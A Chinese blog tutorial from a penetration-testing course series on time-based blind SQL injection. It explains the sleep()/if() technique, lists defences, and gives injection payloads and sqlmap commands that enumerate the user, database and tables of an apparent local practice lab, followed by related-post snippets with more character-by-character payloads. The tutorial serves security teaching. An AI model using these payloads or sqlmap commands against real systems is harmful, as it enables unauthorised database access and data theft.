渗透测试-百日筑基—SQL注入篇&时间注入&绕过&HTTP数据编码&绕过—下

已于 2024-10-25 14:57:04 修改
阅读量1.4k 收藏 27
点赞数 20
分类专栏: 百日筑基 文章标签: sql http oracle 安全 web安全 网络
于 2024-10-25 14:05:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LANDUOSHUREN/article/details/143232540
版权

day8-渗透测试sql注入篇&时间注入&绕过&HTTP数据编码绕过

一、时间注入

    SQL注入时间注入(也称为延时注入)是SQL注入攻击的一种特殊形式,它属于盲注(Blind SQL Injection)的一种。在盲注中,攻击者无法直接从应用程序的响应中获取SQL查询的结果,而是通过观察应用程序的响应时间来推断信息。时间注入正是利用了这一特性,通过使数据库执行延时函数(如MySQL中的sleep()函数)来检测SQL查询的执行情况,从而推断出数据库中的信息。

1、时间注入的工作原理

时间注入的工作原理大致如下:

  1. 构造延时查询:攻击者会在SQL查询中注入一个条件,该条件会触发数据库执行延时函数。例如,在MySQL中,可以使用IF(condition, sleep(time), 0)这样的语句,如果条件满足,则数据库会延时一段时间(如sleep(10)表示延时10秒)返回结果,否则立即返回。
  2. 观察响应时间:攻击者通过观察应用程序的响应时间来判断延时是否发生,从而推断出条件是否满足。如果应用程序的响应时间显著增加,那么可以认为条件满足,即攻击者可以通过这种方式逐步推断出数据库中的敏感信息。

2、时间注入的用途

时间注入主要用于以下场景:

  • 数据库信息探测:攻击者可以通过时间注入来探测数据库的类型、版本、表名、列名等信息。
  • 数据提取:在知道数据库结构的情况下,攻击者还可以利用时间注入来逐字符地提取数据库中的数据,如用户名、密码等敏感信息。

3、防御措施

为了防范时间注入攻击,可以采取以下措施:

  • 使用参数化查询:参数化查询是预防SQL注入的最有效手段之一。通过将SQL语句中的参数与数据值分开处理,确保数据值不会被解释为SQL代码的一部分,从而避免注入攻击。
  • 严格输入验证:对所有用户输入进行严格的验证和过滤,拒绝任何可疑或不合规的数据。
  • 设置响应时间上限:合理设置响应时间的上限,避免过长的响应时间给攻击者以机会。
  • 使用Web应用防火墙(WAF):WAF能够监控和过滤进出Web应用的网络流量,识别和阻止SQL注入等恶意攻击。

4、时间注入攻击方式

时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔型注入获取数据而采用一种突破注入的技巧。

在 mysql 里 函数 sleep() 是延时的意思,sleep(10)就是 数据库延时 10 秒返回内容。判断注入可以使用'and sleep(10) 数据库延时 10 秒返回值 网页响应时间至少要 10 秒 根据这个原理来判断存在 SQL 时间注入。

mysql 延时注入用到的函数 sleep() 、if()、substring()

select if(2>1,sleep(10),0) 2>1 这个部分就是你注入要构造的 SQL 语句。

select if(length(database())>1,sleep(5),0) 这个就是查询当前库大于 1 就会延时 5 秒

执行。

-1' or if(length(database())>1,sleep(5),0)--+ 可以看到网页是大于五秒返回。根据这

个原理 n>1 n 不延时就能确定当前数据库的长度了。

如果想要获取数据内容 可以用截取字符再再进行字符对比 如果相同就进行延时。这样就能获取字符接着再拼接就是当当前库的内容。

5、时间注入代码分析

在页面中分析源码 直接获取 name 带进数据库进行查询,但是是否存在记录页面返回都一样。

在黑盒模式下可以使用 sqlmap 对注入检测。sqlmap 支持多种数据库注入,而且支持多种注入方式。

6、采用时间注入

sqlmap -u "http://192.168.59.135/06/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T
​
-u 表示检测的 url

-p 指定的检测参数

-v 显示调试模式

--technique=T 检测方法为时间注入

7、sqlmap 检测为时间注入 接下来进行 通过这个注入获取数据库的名 用户权限、表、字段等敏感信息的获取。

sqlmap -u "http://192.168.59.135/06/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T --current-user --current-db --batch

--current-user 获取用户

--current-db 当前库

--batch 使用默认模式 自动 y
​

8、获取表 -D 指定数据库 --tables 获取表

sqlmap -u "http://192.168.59.135/06/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T --tables -D pikachu --batch
​

最低0.47元/天 解锁文章
渗透测试SQL注入
weixin_43988774的博客
04-02 5858
SQL注入 SQL注入web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句 sql注入漏洞的产生需要满足 参数用户可控 - 前端传给后端的参数是用户可以控制的 参数代入数据库查询 - 传入的参数拼接到SQL语句,且带入数据库查询 sql注入漏洞的分类: 从注入点区分 数字型注入 字符型注入注入方式区分 报错注入 延时注入 堆叠注入(联合查询注入) 布尔注入(盲注) 宽字节注入 cookie
sql注入6之延时注入(借助sqli-labs版)
最新发布
jonhswei的博客
04-17 1104
SQLi-Labs 的 Less-9 和 Less-10 中,延时注入通过构造 SLEEP 语句,结合条件判断(如 IF、ASCII、SUBSTR),逐字符猜测数据库信息。实践步骤包括确认注入点、验证延时可行性、逐位枚举数据,并可借助 SQLMap 或脚本自动化攻击。延时注入的成功依赖于精准的 Payload 和稳定的网络环境,防御则需从输入验证、参数化查询和权限控制入手。
sql注入时间注入
m0_63436163的博客
04-15 1049
如果想要获取数据内容,可以用截取字符再进行字符对比,如果相同就进行延时。这样就能获取字符,接着再拼接就是当前库的内容。在黑盒模式下可以使用 sqlmap 对注入检测。sqlmap 支持多种数据库注入,而且支持多种注入方式。在页面中分析源码,直接获取 name 带进数据库进行查询,但是是否存在记录页面返回都一样。--technique=T 检测方法为时间注入-u 表示检测的 url。-p 指定的检测参数。
渗透测试-SQL注入
weixin_53696027的博客
02-05 2818
sql注入渗透测试重要的一部分,如果服务器存在sql注入漏洞将面临严重的威胁
sql漏洞注入——时间注入
m0_73756016的博客
11-01 1831
id=1' and if(length(database())>8,sleep(5),0)--+1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。1" and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。select if(length(database())>1,sleep(5),0),这个就是查询当前库大于1,就会延时5秒执行。
渗透测试-百日筑基SQL注入&联合&Boolean&报错&注入—中
LANDUOSHUREN的博客
10-23 1049
渗透测试-百日筑基-day7—SQL注入&注入的类型&流程&攻击union 联合注入原理1. 基本概念2. 攻击场景3. 攻击步骤4. 前置条件5. SQL注入中的UNION联合注入原理主要基于以下几个方面:6. 防御措施一、Union联合注入攻击1、上面详细介绍了原理,现在来分析有sql注入漏洞的代码,通过分析代码,更深入地了解sql注入漏洞2、当传入1时,页面正常返回用户信息3、如果传入1'语法会出现语句You have an error in your SQL syntax;这是mysql语法错
渗透测试-百日筑基-网络安全基础&Vmware
LANDUOSHUREN的博客
10-18 606
渗透测试百日筑基
渗透测试-百日筑基-网络安全基础&渗透测试中常用系统命令
LANDUOSHUREN的博客
10-19 672
基于Linux&windows中常见命令
渗透测试-百日筑基-网络安全基础&渗透测试中常见的编码
LANDUOSHUREN的博客
10-18 320
渗透测试-百日筑基-网络安全基础&渗透测试中常见的编码。
渗透测试sql注入
weixin_46420165的博客
12-08 2349
SQL 注入SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
渗透测试SQL注入(简介)
weixin_53958661的博客
12-18 3134
SQL注入简介,什么是SQL注入SQL注入的分类
个人笔记-渗透测试-SQL注入
weixin_48162696的博客
05-20 1124
SQL注入原理,sql注入的数据类型,sql注入的提交方式,手工注入sqlmap,基础防御,
渗透测试sql注入具体用法
weixin_45754647的博客
05-20 390
sp:6.2 1、判断页面是否有布尔类型 判断1=1 和1=2 页面是否有不同,如果不同,就说明有布尔类型的状态,如果一样那就认为布尔类型状态不存在 2、前提有sql注入漏洞,如果+1\-1,页面有变化,考虑联合查询,如果没有变化,考虑布尔类型状态,看有没有报错,如果有报错,是报错注入,如果没有报错,也没有回显,看是否有布尔类型的状态,如果有布尔类型状态,考虑布尔盲注,如果以上都没有就用延时注入 3、联系查询: 数据...
渗透测试——五、网站漏洞——SQL注入
热门推荐
钟言的博客
12-05 1万+
为学习渗透测试第五课,网站漏洞即SQL注入,详细内容如下:一、走进DVWA测试网站 1、网站渗透测试步骤 2、DVWA网站 3、其他漏洞网站 4、进入DVMA网站 二、暴力破解和SQL注入 1、暴力破解 2、SQL语句 3、PHP语言 4、暴力破解页面之Burp Suite破解 5、暴力破解页面之SQL注入 6、SQL注入页面之 SQL注入 7、SQL注入(盲注)页面之 SQL注人 8、SQL注入(盲注)页面之SQLMap 自动注入等等
sql注入延时注入
weixin_45653478的博客
04-09 2860
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
SQL注入延时注入
m0_56578216的博客
08-23 1064
延时注入就是利用sleep()函数通过if语句判断所写的语句真假,如果为真返回我们想要的东西(例如:数据库的长度,数据库的名字等)如果我们写的东西不符合则会利用sleep()函数让服务器休眠。固定的理解sleep(x) 函数的意义是关键,就是个自行设定如果判断成功那么就会延迟x秒延时注入的关键是sleep函数和if语句,通过sleep函数判断语句的真假,。
shell 提取sql 的字段名表名_渗透测试SQL注入(二)
weixin_39583029的博客
11-16 404
文章原载于公众号:猪猪谈安全作者:随风kali前文一渗透测试SQL注入(一)给大家讲了SQL注入的产生原理,SQL注入的种类和一些防御SQL注入的手段。接下来的章呢都是从实例去分析SQL注入。首先我们先分析一下DVWA靶场low等级的SQL注入。这里有一个user id需要我们填写,那我们先填写一个1看看会发生什么。这里查询到了user id为1号的信息,还记得我们前文说的验证SQL注入的方...
渗透测试SQL注入详解
weixin_50904074的博客
03-09 463
在JAVA、C等强类型语言中一般是不存在数字型注入的,因为在接受到用户输入id时,代码一般会做一个int id 的数据类型转换,假如我们输入的是字符串的话,那么这种情况下,程序就会报错。这里的id是可控的参数,正如我们输入1的时候,数据库执行的语句应为:select *from '参数或字段' where id = 1,但当我们输入1 ' 的时候,数据库的执行语句为select *from '参数或字段' where id = 1 '。sleep(n)会延时显示结果,且延时时间为 n乘查询到的记录条数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值